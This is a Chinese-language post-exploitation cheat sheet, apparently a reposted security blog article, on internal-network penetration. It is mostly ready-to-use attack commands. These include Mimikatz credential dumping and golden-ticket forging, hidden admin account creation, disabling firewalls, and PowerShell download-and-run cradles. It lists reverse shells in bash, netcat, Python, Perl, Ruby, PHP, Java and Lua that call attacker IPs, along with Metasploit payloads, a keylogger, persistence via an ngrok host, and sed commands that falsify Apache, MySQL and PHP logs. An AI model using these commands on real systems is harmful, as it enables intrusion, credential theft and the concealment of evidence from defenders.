內網攻防經典技術備忘錄

2021-02-21 烏雲安全

前言

很早就想專門寫一篇關於內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段:)

信息搜集

nmap掃描實時存活的ip

nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

常用命令

ipsping icmp連通性
nslookup www.baidu.com vps-ip dns連通性
dig @vps-ip www.baidu.com
curl vps:8080 http連通性
tracert
bitsadmin /transfer n http://ip/xx.exe C:\windows\temp\x.exe一種上傳文件 >=2008
fuser -nv tcp 80 查看埠pid
rdesktop -u username ip linux連接win遠程桌面 (有可能不成功)
where file win查找文件是否存在
找路徑,Linux下使用命令find -name *.jsp來查找,Windows下,使用for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %i
netstat -apn | grep 8888 kill -9 PID 查看埠並kill
query user || qwinsta 查看當前在線用戶
net user 查看本機用戶
net user /domain 查看域用戶
net view & net group "domain computers" /domain 查看當前域計算機列表 第二個查的更多
net view /domain 查看有幾個域
net view \\dc 查看dc域內共享文件
net group /domain 查看域裡面的組
net group "domain admins" /domain 查看域管
net localgroup administrators /domain /這個也是查域管,是升級為域控時,本地帳戶也成為域管
net group "domain controllers" /domain 域控
net time /domain
net config workstation 當前登錄域 - 計算機名 - 用戶名
net use \\域控(如pc.xx.com) password /user:xxx.com\username 相當於這個帳號登錄域內主機,可訪問資源
ipconfig
systeminfo 查看系統信息
tasklist /svc
tasklist /S ip /U domain\username /P /V 查看遠程計算機tasklist
net localgroup administrators && whoami 查看當前是不是屬於管理組
netstat -ano
nltest /dclist:xx 查看域控
dsquery
whoami /all 查看Mandatory Label uac級別和sid號
net sessoin 查看遠程連接session(需要管理權限)
net share 共享目錄
cmdkey /l 查看保存登陸憑證
echo %logonserver% 查看登陸域
spn –l administrator spn記錄
set 環境變量
dsquery server - 查找目錄中的 AD DC/LDS 實例
dsquery user - 查找目錄中的用戶
dsquery computer 查詢所有計算機名稱windows 2003
dir /s *.exe 查找指定目錄下及子目錄下沒隱藏文件
arp -a 獲取arp表

腳本收集域信息

使用ntdsxtract提取域信息

git clone https://github.com/csababarta/ntdsxtract.git python setup.py build && python setup.py install

使用被攻擊主機CMD掃描存活ip

for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1.%P | findstr "TTL ="

文件信息搜集

ExifTool可讀寫及處理圖像、視頻及音頻,例如Exif、IPTC、XMP、JFIF、GeoTIFF、ICC Profile。包括許多相機的製造商信息讀取,如佳能,卡西歐,大疆,FLIR,三星等。

exiftool ‐lang zh‐cn ‐a ‐u ‐g1 ./55e736d12f2eb9385716e 513d8628535e4dd6fdc.jpg

Micropoor:」目標資產信息搜集的程度,決定滲透過程的複雜程度。目標主機信息搜集的深度,決定後滲透權限持續把控。滲透的本質是信息搜集,而信息搜集整理為後續的情報跟進提供了強大的保證。」

密碼憑證獲取

提取 KRBTGT用戶帳戶的密碼數據:

Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit

管理員用戶帳戶提取密碼數據:

Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit

發現遠程登錄密碼等密碼 netpass.exe

下載[https://www.nirsoft.net/utils/network_password_recovery.html](https://www.nirsoft.net/utils/network_password_recovery.html)

獲取window vpn密碼:

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

wifi密碼:

netsh wlan show profile 查處wifi名下一條命令用 netsh wlan show profile WiFi-name key=clear

ie代理

reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v ProxyServer
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"

pac代理

reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v AutoConfigURL //引 t0stmail

用戶操作

添加user

net user admin1 admin1 /add & net localgroup administrators admin1 /add

如果不允許遠程連接,修改註冊表

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

如果系統未配置過遠程桌面服務,第一次開啟時還需要添加防火牆規則,允許3389埠,命令如下:

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

關閉防火牆

netsh firewall set opmode mode=disable

添加隱藏帳戶

開啟sys權限cmd

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess 'cmd.exe' -Username 'nt authority\system'

添加用戶並隱藏

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')

反彈shell和埠轉發Lnuix 反彈shell

Bash

bash -i>& /dev/tcp/192.168.146.129/2333 0>&1
bash -i >& /dev/tcp/192.168.146.129/2333 <&2
exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5|while read line;do $line >&5 2>&1;done
nc 192.168.31.174 8080 -t -e /bin/bash

簡單解釋下:

bash -i 打開一個交互的bash

>&將標準錯誤輸出重定向到標準輸出

/dev/tcp/x.x.x.x/port 意為調用socket,建立socket連接,其中x.x.x.x為要反彈到的主機ip,port為埠

0>&1 <span style="color: rgb(51, 51, 51);"> 標準輸入重定向到標準輸出,實現你與反彈出來的shell的交互</span>

telnet反彈

攻擊者主機上打開兩個終端分別執行監聽:

nc -lvvp 4444

nc -lvvp 5555

目標主機中執行:

telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555

監聽兩個埠分別用來輸入和輸出,其中x.x.x.x均為攻擊者ip

反彈shell成功後,在監聽4444埠的終端中執行命令可以在另一個終端中看到命令執行結果。

另一個版本:

rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p

Netcat without -e #1

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Netcat without -e #2

nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444

XTerm

xterm -display 10.0.0.1:1

JDWP RCE

print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())

Working with Restricted Shells

print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java

常見腳本反彈:

1. Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

2. Perl

方法一:

perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

方法二:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

3. Ruby

方法一:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

方法二:

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

4. PHP

php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

5. Java

public class Revs {
/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}

6. Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

埠轉發

被攻擊機 lcx.exe -slave 139.1.2.3 8888 10.48.128.25 3389
vps lcx.exe –listen 8888 5555

netsh win自帶(只支持tcp)

netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.1.101 connectport=8080

將本地80轉到192.168.1.101:8080埠

netsh interface portproxy add v4tov4 listenaddress=1.1.1.101 listenport=8082 connectaddress=192.168.2.102 connectport=3389

通過連接1.1.1.101的8082埠,相當連接1.1.1.101可訪問的內網192.168.2.102的3389埠

portfwd是一款強大的埠轉發工具,支持TCP,UDP,支持IPV4–IPV6的轉換轉發。並且 內置於meterpreter。其中exe單版本源碼如下:[https://github.com/rssnsj/portfwd](https://github.com/rssnsj/portfwd)

攻擊機執行

portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389
portfwd add ‐l 30080 ‐r 192.168.1.119 ‐p 80

分別訪問攻擊機33389,30080,既等價訪問靶機3389,80

提權小結常用exp:

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/WindowsExploits/Exploits


https://github.com/AusJock/Privilege-Escalation

linux提權輔助腳本

https://github.com/jondonas/linux-exploit-suggester-2

windows提權輔助腳本

https://github.com/Ethancck/Windows-Exploit-Suggester

Msf相關

linux相關payload:

linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_bind_tcp_random_port
linux/x64/shell_reverse_tcp

windows相關payload:

windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_hop_http
windows/meterpreter/reverse_http
windows/meterpreter/reverse_http_proxy_pstore
windows/meterpreter/reverse_https
windows/meterpreter/reverse_https_proxy
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

目標伺服器為64位用x64監聽,反彈meterpreter用含有meterpreter的模塊,反彈普通的shell(例如nc),shell_reverse_tcp模塊監聽

例如msf:

反彈shell msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
監聽 windows/meterpreter/reverse_tcp

反彈shell nc -e cmd.exe ip port
監聽 windows/shell_reverse_tcp

meterpreter下上傳 upload file 下載 download file

Msf進程注入(win2008 成功)

meterpreter > getuid
Server username: xxxx
meterpreter > getpid
Current pid: 3456
meterpreter > ps

Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- -- ---- ----
12000 676 shell.exe x86 2 xxx C:\Users\xxx\Desktop\shell.exe
676 1124 explorer.exe x64 2 xxx C:\Windows\explorer.exe

meterpreter > migrate 676
[*] Migrating from 12000 to 676...
[*] Migration completed successfully.

Msf hash

meterpreter > run hashdump 需要sys權限 導出SAM

meterpreter > run post/windows/gather/smart_hashdump 需要sys權限

getsystem存在uac,用msf bypass,但特徵明顯 meterpreter > search bypassuac

msf powerdump load mimikatz 不太好用

Msf的持續後門

Persistence: run persistence -h:用於創建啟動項啟動,會創建註冊表,創建文件。(X86_Linux不支持此腳本)

run persistence -U -i 10 -p 10390 -r free.ngrok.cc

使用powershell執行也被監控而被360攔截

meterpreter 的 run getgui -e 命令可以開啟成 功。360會提示阻止

Run metsvc -h :用於創建服務,會創建meterpreter服務,並上傳三個文件,使用-r參數可以卸載服務 ,被攔

Msf powershell

meterpreter > load powershell
meterpreter > powershell_shell
PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Ps > Invoke-Mimikatz -DumpCreds

Msf Router

2個或多個路由之間,沒有配置相應的路由表,不能訪問,獲得一臺機器shell session 添加路由,使msf可以在當前shell session下以被攻擊機訪問其他內網主機.

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 172.17.0.0/255.255.0.0
meterpreter > run autoroute -s 172.17.0.0/16 添加路由
meterpreter > run autoroute -p 查看路由
meterpreter > run autoroute -d -s 172.17.0.0/16 刪除

鍵盤記錄

Msf鍵盤記錄在windows不會創建新進程

meterpreter > keyscan_start meterpreter > keyscan_dump meterpreter > keyscan_stop

Payload下載(windows)

自windows7 以上版本內置bitsadmin,它可以在網絡不穩定的狀態下下載文件,出錯會自 動重試,在比較複雜的網絡環境下,有著不錯的性能。

bitsadmin /rawreturn /transfer down "[http://vps/hello.php](http://vps/hello.php)" G:\text\hello.php

mimikatz 和procdump 獲得內存 hash

如果伺服器是64位,要把Mimikatz進程遷移到一個64位的程序進程中,才能查看64位系統密碼明文。32位任意

運行procdump.exe -accepteula -ma lsass.exe lsass.dmp(管理權限)後lsass.dmp放到mimikatz.exe同目錄,運行以下命令

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

導出當前 內存 hash,需要免殺過av等

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Windows Server 2012,部分Windows Server 2008默認無法使用mimikatz導出明文口令

黃金票據(維持權限)

域用戶sid

whoami /all

krbtgt hash

mimikatz "lsadump::dcsync /domain:xx.com /user:krbtgt"

域管 net group "domain admins" /domain 這裡的是administrator

mimikatz "kerberos::purge""kerberos::golden /admin:administrator /domain:xx.com /sid:S-1-5- /krbtgt:hash /ticket:Adminstrator.kiribi""kerberos::ptt Administrator.kiribi""kerberos::tgt"

痕跡擦除

在滲透中,想要不留痕跡的(當然這是很難的),就要對自己的留下的痕跡進行擦除,這裡以Lniux為例。

Linux痕跡清除

Apache日誌

Apache主要的日誌就是access.log``error_log,前者記錄了HTTTP的訪問記錄,後者記錄了伺服器的錯誤日誌。這些都可以在httpd.conf中找到。

明文的Apache文件,通過正則表達式就可以搞定:

sed –i 's/192.168.1.3/192.168.1.4/g' /var/log/apache/ access.logsed –i 's/192.168.1.3/192.168.1.4/g' /var/log/apache/error_log

其中192.168.1.3是我們的IP,192.168.1.4使我們偽造的IP。在正則表達式中有特殊的含義,所以需要用「」來進行轉義。

MySQL日誌文件

log-error=/var/log/mysql/mysql_error.log #錯誤日誌
log=/var/log/mysql/mysql.log#最好注釋掉,會產生大量的日誌,包括每一個執行的sql及環境變量的改變等等
log-bin=/var/log/mysql/mysql_bin.log # 用於備份恢復,或主從複製.這裡不涉及。
log-slow-queries=/var/log/mysql/mysql_slow.log #慢查詢日誌
log-error=/var/log/mysql/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

執行下述命令清除即可

sed –i 's/192.168.1.3/192.168.1.4/g'/var/log/mysql/mysql_slow.log

至於二進位日誌文件,需要登錄mysql client來修改刪除,建議這種操作最先執行。

php日誌修改

sed –i 's/192.168.1.3/192.168.1.4/g'/var/log/apache/php_error.log

Linux日誌清除

這個比較多,記錄的也比較複雜,測試環境是CentOS 6.3。只把和滲透有關的文件列出來,主要在/etc/logrotate.d/syslog中

/var/log/maillog,該日誌文件記錄了每一個發送到系統或從系統發出的電子郵件的活動,它可以用來查看用戶使用哪個系統發送工具或把數據發送到哪個系統

var/log/messages,該文件的格式是每一行包含日期、主機名、程序名,後面是包含PID或內核標識的方括號,一個冒號和一個空格

/var/log/wtmp,該日誌文件永久記錄每個用戶登錄、註銷及系統的啟動,停機的事件。該日誌文件可以用來查看用戶的登錄記錄,last命令就通過訪問這個文件獲得這些信息,並以反序從後向前顯示用戶的登錄記錄,last也能根據用戶,終端tty或時間顯示相應的記錄

/var/run/utmp,該日誌文件記錄有關當前登錄的每個用戶的信息,因此這個文件會隨著用戶登錄和註銷系統而不斷變化,它只保留當時聯機的用戶記錄,不會為用戶保留永久的記錄。系統中需要查詢當前用戶狀態的程序,如who、w、users、finger等就需要訪問這個文件

/var/log/xferlog,該日誌文件記錄FTP會話,可以顯示出用戶向FTP伺服器或從伺服器拷貝了什麼文件。該文件會顯示用戶拷貝到伺服器上的用來入侵伺服器的惡意程序,以及該用戶拷貝了哪些文件供他使用。

bash_history,這是bash終端的命令記錄,能夠記錄1000條最近執行過的命令(具體多少條可以配置),通過這個文件可以分析此前執行的命令來知道知否有入侵者,每一個用戶的home目錄裡都有這麼一個文件

安利的腳本:https://github.com/JonGates/jon](https://github.com/JonGates/jon

後言

滲透是一門藝術,外練一口氣,內練筋骨皮,時常鞏固自己的知識體系,才能站在滲透的一線。最後向發揚分享精神的Micropoor致敬!貼出大佬的github:

https://github.com/Micropoor/Micro8

長按二維碼關注烏雲安

往期推薦

內網橫向滲透的常用姿勢

滲透測試之提權方式總結

滲透測試之windows系統提權總結

滲透測試某大型網際網路公司的思路與收穫

相關焦點

  • 乾貨 | 內網攻防經典技術備忘錄
    前言很早就想專門寫一篇關於內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段:)信息搜集nmap掃描實時存活的ipnmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d "
  • 內網攻防備忘錄
    點擊上方藍字關注"網信防務"來源:REEBUF  作者:cck前言很早就想專門寫一篇關於內網的文章,一直沒有騰出空來,萬萬沒想到,寫下這篇文章的時候,竟然是我來某實驗室實習的時間段。192.168.1.101:8080埠netsh interface portproxy add v4tov4 listenaddress=1.1.1.101 listenport=8082 connectaddress=192.168.2.102 connectport=3389通過連接1.1.1.101的8082埠,相當連接1.1.1.101可訪問的內網
  • 黑客攻防經典教程50篇【鵬越·學霸專區】
    學習黑客攻防的目的,不是為了給心懷惡意者提供破壞工具,而是希望讓對網絡感興趣的人拓展熟練技巧,以抵禦此類攻擊或破壞行為。這裡收集了50篇黑客攻防經典教程,相信會對這方面的愛好者起到幫助。 .51cto.com/data/605463 【DOS學習利器】DOS練習攻擊模擬學習器http://down.51cto.com/data/90101 黑客如何攻擊網站及具體實例【原創】http://down.51cto.com/data/132480 黑客必備入侵免殺工具包合集 http://down.51cto.com/data/240283  網絡安全技術經典文章打包下載
  • ISW 2017企業內網安全實戰靶場對抗賽圓滿落幕
    Triangle戰隊和來自蘇州錦佰安信息技術股份有限公司的SecID戰隊獲得了最佳技術獎。現場網絡管理員劉輝和江興爐也憑藉在比賽中突出的表現獲得了最佳網絡管理員獎。錦行科技COO董梁為戰隊頒獎  近年來,雖然很多企業越來越重視信息安全建設工作,但內網敏感數據洩露事件仍然頻發。
  • 內網安全攻防之內網滲透測試基礎
    一、內網基礎知識工作組,即Work Group,是最常見最簡單最普通的資源管理模式。
  • 從實戰演練看攻防對抗思維的轉變
    以攻促防: 實戰攻防演練推動攻防進步 自2016年《網絡安全法》頒布以來,網絡安全實戰攻防演練專項行動已成為一年一度的慣例,同時所涉及的單位和規模持續擴大。
  • 內網穿透
    首先解釋一下「內網」與「外網」的概念:內網:即所說的區域網,比如學校的區域網,區域網內每臺計算機的IP位址在本區域網內具有互異性,是不可重複的。但兩個區域網內的內網IP可以有相同的。外網:即網際網路,區域網通過一臺伺服器或是一個路由器對外連接的網絡,這個IP位址是唯一的。也就是說內網裡所有的計算機都是連接到這一個外網IP上,通過這一個外網IP對外進行交換數據的。
  • 散打技術及人體攻防要害部位
    ·人體攻防要害部位1主要攻擊部位在散打技術中,人體的拳、掌、勾、肘、膝、腿等許多部位都可以作為進攻的「武器」,但在比賽中不允許使用肘關節進攻。拳法是散打技術中的一個重要組成部分,也是比賽中運用最多的技術之一。拳的關節部位比較堅硬,運用得好可以重創對方。B掌四指伸直併攏,拇指內扣、彎曲、貼近虎口稱為掌。掌心向下,掌指向前,為俯掌;掌心向前,掌指向上,為立掌。掌的擊打力點有掌根、掌指、掌背。掌多用於劈、推等動作技法。
  • 中國巴基斯坦籤署關於經典著作互譯出版的備忘錄為共建中巴命運...
    中國巴基斯坦籤署關於經典著作互譯出版的備忘錄為共建中巴命運共同體注入新的人文動力人民日報  作者:  2021-01-06 為貫徹落實習近平主席2019年5月在亞洲文明對話大會上提出的「中國願同有關國家一道,實施亞洲經典著作互譯計劃」重要倡議精神,中國與巴基斯坦相關部門積極籌備磋商
  • 中國巴基斯坦籤署關於經典著作互譯出版的備忘錄 為共建中巴命運...
    本報北京1月5日電  為貫徹落實習近平主席2019年5月在亞洲文明對話大會上提出的「中國願同有關國家一道,實施亞洲經典著作互譯計劃」重要倡議精神,中國與巴基斯坦相關部門積極籌備磋商,2021年1月5日,中巴雙方宣布籤署《中華人民共和國國家新聞出版署與巴基斯坦伊斯蘭共和國國家遺產和文化署關於經典著作互譯出版的備忘錄
  • 滲透測試團隊技術評級那些事兒
    ,對測試備忘錄中的所有漏洞都了解並能進行測試;3.至少熟悉一門程式語言C/C++/Perl/Python/PHP/Go/Java等,能夠進行腳本、漏洞驗證的poc編寫或改寫;4.熟悉Linux和UNIX主流作業系統和主流資料庫(SQL、MySql、ORACLE等)並具備滲透測試能力;5.能熟練搭建靶機並進行漏洞復現,並有文章總結輸出3篇以上;6
  • 網絡攻防溯源普及和醫療數據安全總結
    本文是「網絡安全提高班」第一篇文章,將帶領大家了解網絡安全攻防知識點,並以醫療數據安全為基礎進行總結,具體內容包括:Part1:網絡空間安全與溯源Part2:網絡安全攻防技巧Part3:醫療數據安全防護Part4:APT攻擊醫療行業經典案例Part5:醫療安全防禦建議作者作為網絡安全的小白,分享一些自學基礎教程給大家
  • 淺析內網信息收集
    文章前言在滲透測試中信息收集的深度與廣度以及對關鍵信息的提取,直接或間接的決定了滲透測試的質量,本篇文章主要對內網中信息收集做一個簡單的歸納以及介紹主機信息在內網滲透測試中,當我們拿下一臺或多臺可控的主機(大多數情況下都是邊界主機)時,我們首先要對當前主機的信息進行簡易收集,常見的信息包括以下幾個方面:網絡配置通過執行以下命令查看當前機器是否處於內網,以及內網網段是多少,以及DNS地址、域名信息等等:
  • 持續監控與分析:黑客攻防的以不變應萬變
    首頁 > 傳媒 > 關鍵詞 > IDS最新資訊 > 正文 持續監控與分析:黑客攻防的以不變應萬變
  • 什麼是內網、公網和NAT?讀懂這一篇就夠!
    1、內網、公網和NAT的定義內網也叫區域網,從範圍上來講內網就是小部分的網絡,一般指的是特定環境下組成網絡,比如某一個家庭多臺計算機互聯成的網絡,也可以學校和公司的大型區域網,內網的IP一般都是192.168.1.100,192.168.0.100,172.16.1.100……這些都是內網IP,內網是不能直接連接外網,比較封閉
  • CS內網開服聯機的方法-百家號 - 百度經驗
    筆者是下載安裝的CS1.6起源經典版本,安裝包才180M,綠色無插件-><-。我的CS1.6安裝目錄是F:\game\Myapplication。2.開服參數配置。找到配置文件F:\game\Myapplication\cstrike\server.cfg直接用記事本打開編輯。
  • 如何用入侵檢測系統保護內網的伺服器
    企業內網的伺服器都存有企業的重要信息,包括CRM用戶信息、技術資料等。所以內網伺服器的信息安全是企業網絡管理的重點。內網伺服器不但面臨外來的攻擊,也會受到來自內部的攻擊。在本文中,我將介紹如何用WFilter NGF的入侵防禦模塊來保護內網伺服器。
  • 網絡安全與Kali Linux滲透:內網與區域網攻防實戰技巧
    搜索:Kali與編程,學習更多網絡攻防乾貨!下篇文章將在明天下午五點發布,敬請關注!
  • 華為常見配置,AR路由器配置內網用戶通過公網地址訪問內網伺服器
    華為常見配置 AR路由器配置內網用戶通過公網地址訪問內網伺服器1、應用場景為保證內網伺服器免受內網用戶的攻擊,可設置內網主機必須使用內網伺服器的外網IP位址才能訪問內網伺服器(即對與內網用戶而言,其看不到內部伺服器的私網IP位址)。